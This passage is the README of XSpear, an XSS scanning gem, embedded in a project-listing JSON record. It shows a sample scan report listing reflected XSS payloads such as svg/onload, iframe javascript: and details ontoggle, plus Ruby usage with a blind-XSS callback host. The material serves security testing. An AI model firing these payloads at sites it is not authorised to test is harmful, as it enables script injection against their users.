onfocus=alert(45)\u003e\",\"description\":\"reflected onfocus XSS Code\"},{\"id\":14,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cmarquee onstart=alert(45)\u003e\",\"description\":\"reflected HTML5 XSS Code\"},{\"id\":15,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cinput autofocus onfocus=alert(45)\u003e\",\"description\":\"reflected onfocus XSS Code\"},{\"id\":16,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\\\"\u003e\u003ciframe/src=JavaScriPt:alert(45)\u003e\",\"description\":\"reflected XSS Code\"},{\"id\":17,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cmeter onmouseover=alert(45)\u003e0\u003c/meter\u003e\",\"description\":\"reflected HTML5 XSS Code\"},{\"id\":18,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003ckeygen autofocus onfocus=alert(45)\u003e\",\"description\":\"reflected onfocus XSS Code\"},{\"id\":19,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003caudio src onloadstart=alert(45)\u003e\",\"description\":\"triggered \u003caudio src onloadstart=alert(45)\u003e\"},{\"id\":20,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cmarquee onstart=alert(45)\u003e\",\"description\":\"triggered \u003cmarquee onstart=alert(45)\u003e\"},{\"id\":21,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cdetails/open/ontoggle=\\\"alert(45)\\\"\u003e\",\"description\":\"triggered \u003cdetails/open/ontoggle=\\\"alert(45)\\\"\u003e\"},{\"id\":22,\"type\":\"VULN\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cscript\u003ealert(45)\u003c/script\u003e\",\"description\":\"triggered 
\u003cscript\u003ealert(45)\u003c/script\u003e\"},{\"id\":23,\"type\":\"VULN\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"'\\\"\u003e\u003csvg/onload=alert(45)\u003e\",\"description\":\"triggered \u003csvg/onload=alert(45)\u003e\"}]}\n```\n\n## Usage on ruby code\n```ruby\nrequire 'XSPear'\nrequire 'json'\n\n# Set options\noptions = {}\noptions['thread'] = 30\noptions['cookie'] = \"data=123\"\noptions['blind'] = \"https://hahwul.xss.ht\"\noptions['output'] = \"json\"\n\n# Create XSpear object with url, options\ns = XspearScan.new \"https://www.hahwul.com?target_url\", options\n\n# Scanning\ns.run\nresult = s.report.to_json\nr = JSON.parse result\n```\n\n## Add Scanning Module\n**1) Add `makeQueryPattern`**\n```ruby\nmakeQueryPattern('type', 'query,', 'pattern', 'category', \"description\", \"callback function\")\n# type: f(iltered?) r(eflected?) x(ss?)\n# category: i(nfo) v(uln) l(ow) m(edium) h(igh)\n\n# e.g.\n# makeQueryPattern('f', 'XsPeaR,', 'XsPeaR,', 'i', \"not filtered \"+\",\".blue, CallbackStringMatch)\n```\n\n**2) For a different callback, write a callback class that overrides `ScanCallbackFunc`**\ne.g.\n```ruby\nclass CallbackStringMatch \u003c ScanCallbackFunc\n  def run\n    if @response.body.include? @query\n      [true, \"reflected #{@query}\"]\n    else\n      [false, \"not reflected #{@query}\"]\n    end\n  end\nend\n```\n\nParent class (ScanCallbackFunc)\n```ruby\nclass ScanCallbackFunc\n  def initialize(url, method, query, response)\n    @url = url\n    @method = method\n    @query = query\n    @response = response\n    # self.run\n  end\n\n  def run\n    # override in subclasses\n  end\nend\n```\n\nCommon callback classes\n- CallbackXSSSelenium\n- CallbackErrorPatternMatch\n- CallbackCheckHeaders\n- CallbackStringMatch\n- CallbackNotAdded\n- etc...\n\n## Update\nIf you are a normal user:\n```\n$ gem update XSpear\n```\n\nIf you are a developer (soft):\n```\n$ git pull -v\n```\nIf you are a developer (hard reset):\n```\n$ git reset --hard HEAD; git pull -v\n```\n\n## RubyDoc\nhttps://www.rubydoc.info/gems/XSpear/\n\n## Development\n\nAfter checking out the repo, run `bin/setup` to install dependencies. Then, run `rake spec` to run the tests. You can also run `bin/console` for an interactive prompt that will allow you to experiment.\n\nTo install this gem onto your local machine, run `bundle exec rake install`. To release a new version, update the version number in `version.rb`, and then run `bundle exec rake release`, which will create a git tag for the version, push git commits and tags, and push the `.gem` file to [rubygems.org](https://rubygems.org).\n\n## Contributing\n\nBug reports and pull requests are welcome on GitHub at https://github.com/hahwul/XSpear. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the [Contributor Covenant](http://contributor-covenant.org) code of conduct.\n\n## Donate\n\nI like coffee! 
I'm a coffee addict.\u003cbr\u003e\n\u003ca href=\"https://www.paypal.me/hahwul\"\u003e\u003cimg src=\"https://www.paypalobjects.com/digitalassets/c/website/logo/full-text/pp_fc_hl.svg\" height=\"50px\"\u003e\u003c/a\u003e\n\u003ca href=\"https://www.buymeacoffee.com/hahwul\"\u003e\u003cimg src=\"https://cdn.buymeacoffee.com/buttons/default-black.png\" alt=\"Buy Me A Coffee\" height=\"50px\"\u003e\u003c/a\u003e\n\n## License\n\nThe gem is available as open source under the terms of the [MIT License](https://opensource.org/licenses/MIT).\n\n## Code of Conduct\n\nEveryone interacting in the XSpear project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://github.com/[USERNAME]/XSpear/blob/master/CODE_OF_CONDUCT.md).\n\n## ScreenShot\n\u003c Scanning Image\u003e\n\u003cimg src=\"https://user-images.githubusercontent.com/13212227/71557939-c8c17400-2a90-11ea-9307-6cd9b9736afc.png\" width=100%\u003e\n\u003c CLI-Report 1 \u003e\n\u003cimg src=\"https://user-images.githubusercontent.com/13212227/71557940-c8c17400-2a90-11ea-90f4-589366f8fba8.png\" width=100%\u003e\n\u003c CLI-Report 2 \u003e\n\u003cimg src=\"https://user-images.githubusercontent.com/13212227/71557941-c8c17400-2a90-11ea-9cfe-90e9b5d51c34.png\" width=100%\u003e\n\u003c JSON Report \u003e\n\u003cimg src=\"https://user-images.githubusercontent.com/13212227/63032411-b8996580-bef0-11e9-8aee-0b80fe87f50d.png\" width=100%\u003e\n\u003c HTML Report \u003e\n\u003cimg src=\"https://user-images.githubusercontent.com/13212227/74363820-b1570400-4e0e-11ea-9ce5-c78319a9d81c.png\" width=100%\u003e\n\n## Video\n[![asciicast](https://asciinema.org/a/290126.svg)](https://asciinema.org/a/290126)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhahwul%2FXSpear","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhahwul%2FXSpear","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhahwul%2FXSpear/lists"}
